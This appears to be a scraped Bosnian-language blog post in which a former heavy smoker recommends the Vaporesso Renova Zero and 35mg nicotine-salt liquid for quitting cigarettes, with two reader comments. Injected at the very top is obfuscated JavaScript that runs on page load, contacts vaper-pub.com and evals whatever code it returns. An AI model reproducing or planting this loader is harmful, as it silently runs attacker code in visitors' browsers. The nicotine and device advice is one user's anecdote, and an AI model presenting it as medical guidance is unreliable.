;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}
Savjeti za početnike vapere

Moje iskustvo s e cigaretama

by Edin Čehić

Evo pošto svi pišu neke recenzije i daju svoja mišljenja, smatram da bih i ja trebao napraviti nešto. Ne radi sebe, već radi ljudi koji su tek počeli ili razmišljaju da ostave cigarete pomoću e cigareta.

Ovo što pišem je moje lično iskustvo i molim Vas da na ovo gledate tako a ne kao na neko profesionalno mišljenje.

Bio sam strastveni pušač. Pušio sam 23 godine bez prestanka. Većinu tog vremena sam pušio kutiju dnevno i nisam imao nekih problema. Kasnije, kako su mi se obaveze povećavale i nivo stresa rastao, počeo sam pojačavati, da bih na kraju došao na dvije kutije dnevno. To je već količina koja ostavlja traga na organizmu. Počeo sam se previše umarati, kašljao sam skoro konstantno. Svako jutro sam izbacivao šlajm. Postalo je već pomalo zabrinjavajuće. Shvatio sam da moram nešto napraviti.

Opcija da prestanem pušiti tek tako nije postojala jer sam bio onaj pušač koji kad krene spavati, ako imam jednu cigaretu u kutiji, prvo idem na benzisku kupiti cigarete za svaki slučaj da ne bi nestalo, pa tek onda idem na spavanje. Iz tog razloga krenuo sam istraživati alternative.

Krenuo sam od IQOS-a. Probao s tim. Uh kakvo je to razočarenje bilo. Ne razumijem kako iko može to da koristi. Ali ajd, idemo dalje, nije to bitno. Slijedeće što sam nabavio je Vaporesso Sky Solo Plus. E to je već bilo malo bolje ali pošto sam početnik, previše mi je to pare bilo i nije mi DL bio dobra opcija za ostaviti cigarete.

Onda sam nabavio uređaj koji bih iskreno preporučio svima koji tek počinju. Pravi MTL, pravi osjećaj pušenja sa nikakvim poznavanjem „Zakona Vejpa“, pravi užitak.

Taj magični uređaj je Renova Zero od Vaperossa. Kad ga kupite, dobijete uređaj sa baterijom od 650mAh, dobijete dva tanka sa grijačima, jedan od 1.0 ohm MESH grijač i drugi od 1.3 ohm CCELL keramički grijač.

Uz to kupite neku duhansku NicSalt tečnost od 35mg nikotina, bit će vam dovoljno.

Moj savjet za početnike je da krenu sa keramičkim grijačem, ima manji protok zraka, sporije se zagrijava, ima manje pare, throat hit je slabiji i samim tim je prihvatljiviji početnicima. Pare ima dosta više nego klasična cigareta dima i aroma je odlična. Na tom grijaču sam bez problema protjerao 30ml tečnosti. To je meni vremenski bilo nekih 10 dana.

Nakon toga već se grlo navikne na paru i malo vam se popravi okus i tad stavljate MESH grijač i tu ostajete bez riječi. Opet iznova se iznenadite jer sad imate još više pare, još jači throat hit i aromu koja je nevjerojatna.

Kad potrošite i taj drugi grijač, koji je kod mene također izdržao 10-tak dana, već je prošlo nekih ukupno 20-tak dana kako ne pušite i napravili ste ogroman korak i lagano, nesvjesno, ušli u svijet parenja. Ako budete kao ja, to će vam postati novi hobi, a ako ne, imat ćete predstavu otprilike u kojem pravcu dalje želite ići.

Meni, koji sam bio ekstreman pušač, ovaj uređaj je pomogao, vjerujem da će i vama. Ne pušim već nešto više od mjesec dana i niti jednom nisam imao krizu. Iskreno zapalio sam od tad povremeno sa prijateljima ali nisam više uživao u cigareti, smrdjela mi je i nije mi se svidjelo kakav okus u ustima imam poslije nje.
Toliko od mene. Ponavljam, ovo je moje iskustvo kao početnika ali vas molim da probate, vjerujte, isplatit će vam se.

Choose your Reaction!
  • Ja sam sad nakon skoro punih godinu dana kako vejpam u toj fazi da o cigaretama uopće ne razmišljam,
    često su mi nadohvat ruke Marlboro, Davidoff i Lucky Strike i uopće me ne hvata želja da zapalim.
    Pred jedno mjesec dana sam zapalio Marlboro, izdimio cigaretu do kraja da ju ne upropastim, iako mi već na prvi dim nije odgovarala ali eto, htio sam sam sebe istestirati.
    Znači, u toj sam fazi da sam ravnodušan prema cigaretama. Mogu boraviti u prostoriji gdje se umjereno dimi, ali kad pretjeraju bježim van ;)

  • Kada dođes do toga da ti cigareta smrdi i da imaš feeling kao da pušiš novine na konju si,a to dođe velikoj većini dosta brzo i samo se pojačava s vremenom.I onda kreće ono što si naveo-hobi plus sav si happy šta ne pušiš i uživas u svemu novome šta otkriješ u svijetu pare!

Leave a Comment